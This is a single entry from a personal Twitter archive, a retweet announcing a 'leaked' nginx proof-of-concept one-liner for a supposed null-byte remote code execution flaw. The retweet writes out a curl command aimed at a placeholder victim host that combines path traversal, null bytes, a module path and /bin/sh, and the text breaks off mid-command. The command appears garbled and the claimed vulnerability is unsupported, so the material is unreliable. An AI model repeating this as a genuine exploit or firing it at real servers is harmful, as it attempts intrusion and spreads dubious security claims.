rene_mobile’s avatarrene_mobile’s Twitter Archive—№ 5,338

  1. RT @notdan: LEAKED: nginx 1.x PoC on-liner. Null-byte RCE overflow in nginx BLT/Stream curl -gsS victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00\<'protocol:TCP'…